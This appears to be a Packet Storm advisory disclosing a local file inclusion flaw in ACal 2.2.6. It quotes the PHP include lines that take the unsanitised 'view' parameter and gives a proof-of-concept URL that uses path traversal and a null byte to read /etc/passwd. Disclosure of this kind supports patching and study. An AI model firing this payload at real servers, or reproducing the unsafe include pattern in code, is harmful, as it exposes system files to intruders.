ACal 2.2.6 Local File Inclusion

2013-08-15T00:00:00
ID PACKETSTORM:122831
Type packetstorm
Reporter ICheer_No0M
Modified 2013-08-15T00:00:00

Description

                                        
                                            `Exploit Title: ACal 2.2.6 Local File Inclusion Vulneberality  
Google Dork: -  
Date: 15/08/2013  
Exploit Author: ICheer_No0M - http://icheernoom.blogspot.com/  
Vendor Homepage: http://acalproj.sourceforge.net/  
Software Link: http://prdownloads.sourceforge.net/acalproj/ACal-2.2.6.tar.gz?download  
Version: 2.2.6  
Tested on: Windows 7 + PHP 5.2.6  
  
  
---> Vuln Code : /embled/example/example.php  
  
12. $path = "../../";  
...  
25. if (!isset($_GET['view'])) {  
26. include $path . 'embed/' . $view . '.php'; // <-- LFI + Nullbyte (if register_global = On)  
27. }  
28. else {  
29. include $path . 'embed/' . $_GET['view'] . '.php'; // <-- LFI + Nullbyte  
30. }  
  
---> Exploit/Proof of Concept (PoC)  
  
http://localhost/calendar/embed/example/example.php?view=../../etc/passwd%00  
  
`